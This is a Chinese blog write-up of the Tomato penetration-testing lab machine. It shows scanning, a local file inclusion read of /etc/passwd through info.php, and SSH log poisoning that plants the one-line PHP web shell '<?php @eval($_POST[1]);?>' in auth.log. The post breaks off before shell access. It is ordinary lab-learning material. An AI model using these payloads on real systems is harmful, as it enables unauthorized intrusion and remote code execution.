Tamato

最新推荐文章于 2024-09-05 17:22:26 发布
最新推荐文章于 2024-09-05 17:22:26 发布
阅读量229 收藏 3
点赞数 7
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71053667/article/details/140776408
版权

1.导入靶机,扫端口目录

访问tomato/antibot_image/

访问/antibot_image/antibots/info.php,右击查看源代码,发现文件包含漏洞

2.漏洞利用,在url后输入?image=/etc/passwd,有显示,存在文件包含漏洞

发现端口没有全部扫描出来,使用这个命令扫描nmap -A 192.168.184.154 -p-

-A: 这个选项启用了“侵略性扫描”,包括操作系统检测、版本检测、脚本扫描和跟踪路由等功能。侵略性扫描通常会提供更多的信息,但也可能引起目标系统的注意。

-p-: 这个选项告诉 nmap 扫描目标系统上的所有可能的端口。扫描所有端口可能会耗费一定的时间,但可以全面了解目标系统上开放的哪些端口,以及哪些端口可能存在漏洞

报错连接 2211

ssh '<?php @eval($_POST[1]);?>'@192.168.87.133 -p 2211 

/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

该目录下发现多了一些报错信息,大概率写入木马成功

ps:机子有问题无法进行下面步骤相关后续请看大佬[tomato]靶机复现漏洞详解!-CSDN博客

发生什么事了318
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机实战系列之Tomato靶机,2024年最新oppo鸿蒙面试
2401_84159966的博客
04-18 941
linux-exploit-suggester可以用来枚举内核漏洞。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。本地文件包含发现账号tomcat。image参数 存在 文件包含。1.4 源码分析+文件包含。1.6 反弹shell。1.7 内核漏洞枚举。
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1552
小白学渗透
tomato靶机渗透测试
weixin_49340699的博客
07-28 1386
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
Whole Tomato Visual Assist X,灵活地使用代码文件
q2315702359的博客
05-14 782
Whole Tomato Visual Assist X,灵活地使用代码文件   什么是Whole Tomato Visual Assist X?   VA或除法辅助可以为C ++和C#的开发人员填补Visual Studio中的空白。   整个Tomato Visual Assist X的主要功能:   快速导航   Whole Tomato Visual Assist X允许用户和开发人员以新发现的方式移动用户代码,并且可以灵活地使用现有的任何文件...
NodeMCU 刷固件上手笔记
春暖花开
08-17 5485
本文结合个人实战经验,介绍了NodeMCU刷固件的步骤,并说明了几个需要格外注意的点,并用实际效果图做辅助说明
NodeMCU第一步(固件烧写)
热门推荐
夜风微凉的博客
07-25 2万+
一开始做环境监测项目时是以STM32做控制板,外接传感器,Wifi模块的方案来做的。在收集Wifi模块资料的过程中发现ESP8266本身就是一个MCU并且可对其进行二次开发,也就是直接可以取消上一个STM32的环节。然后在某宝上就找到这个模块。 首先开始找资料,模块是安信可公司生产的,并且提供全部开发资料 对该模块的开发有两种方式:一种是基于乐鑫官方推出的SDK开发包在 安信可ESP的一体...
java复习1
weixin_42923199的博客
01-22 123
  1.2关键字 关键字就是书写java源代码时基本元素。这些基本元素用一些英文单词表示,而这些单词在java语言中有特定的意义。所有的关键字参看下图:     1.3标识符 什么是标识符呢? 简单说在程序中自定义的一些名称。   由26个英文字母大小写,数字:0-9 符号:_ $ 组成       //字符   定义合法标识符规则: 1,数字不可以开头。 2,不...
Python入门—基本语法
一名嵌入式软件工程师的自我成长
04-16 815
有标准C的基础,听过过python大名:人生苦短,我用python!参照的课本是《Python编程:从入门到实践(第三版)》,IDE是Pycharm社区版,看的太快,容易导致忘得也快,并且有些地方和C相似,容易弄混,所以记录下来,用于时常回顾下~ 1. 变量和简单数据形式 在python中,用引号括起的都是字符串,其中的引号可以使单引号,也可以是双引号; #title()函数是以首字母大写的方式显...
Python基础教程(学习笔记整理DAY3)
weixin_44381086的博客
07-01 605
文章目录高阶函数map()函数reduce()函数filter()函数模块与包time模块random模块面向对象程序设计类定义语法属性方法继承方法的重写多重继承多态性运算符的重载 高阶函数 可以接收其他函数作为参数的函数。 任务:利用add(x,y,f)函数,计算:x的平方根与y的平方根之和。 代码演示如下: import math def func(x,y,f): # 可以接收其他函数作为参数,这样的函数即为“高阶函数” return f(x) + f(y) print(func
Whole tamato
09-03
支持vs2013,最新Whole.Tomato带注册机
Tamato 1.19_9189 路由固件
05-31
tomato ip限速版,ip限速版,bcm4712 dell 2300 v2 moto 850 wrt54g
WholeTomatoVisualAssistX(内含KEY)
12-13
一般VC助手用过一段时间后,需要KEY才能继续使用,当然也可以通过其它方法获得使用的权限,为了不让大家麻烦,在压缩包飞翔下载说明中直接附上了KEY!
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 237
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
【网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
goldfish8848的博客
08-31 1514
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
浅谈网络安全的认识与学习规划
最新发布
qq_201729558
09-05 278
本文主要介绍网络安全认识与学习规划
全球性“微软蓝屏”事件的深思:网络安全与系统稳定性的挑战与应对
图灵追幕者博客录
09-05 564
近日,由于微软视窗系统软件更新引发的全球性“微软蓝屏”事件,成为科技领域的热点新闻。这次事件不仅影响了全球约850万台设备,波及航空、医疗、传媒等关键行业,还导致美国超过2.3万架次航班延误。如此规模的系统中断,再次将网络安全与系统稳定性的问题推上了风口浪尖。这次事件为我们敲响了警钟,提醒我们必须更加重视网络安全和系统稳定性。那么,如何构建一个更加稳固和安全的网络环境?在网络安全和系统稳定性方面,我们应采取哪些措施?
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 1049
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1533
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全中的重要性
wholeliubei的博客
09-05 165
人工智能(AI)是计算机科学的一个分支,基于某些独特的算法和相关数学计算,使机器能够拥有人类的决策能力。另一方面,网络安全包括保护虚拟世界免受网络攻击和威胁的安全措施。人工智能能够通过采取与精确算法和数学计算相关的安全措施来保护和清理网络空间。随着人工智能在现代世界中的作用增加,对网络安全的威胁已成为一个严重的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值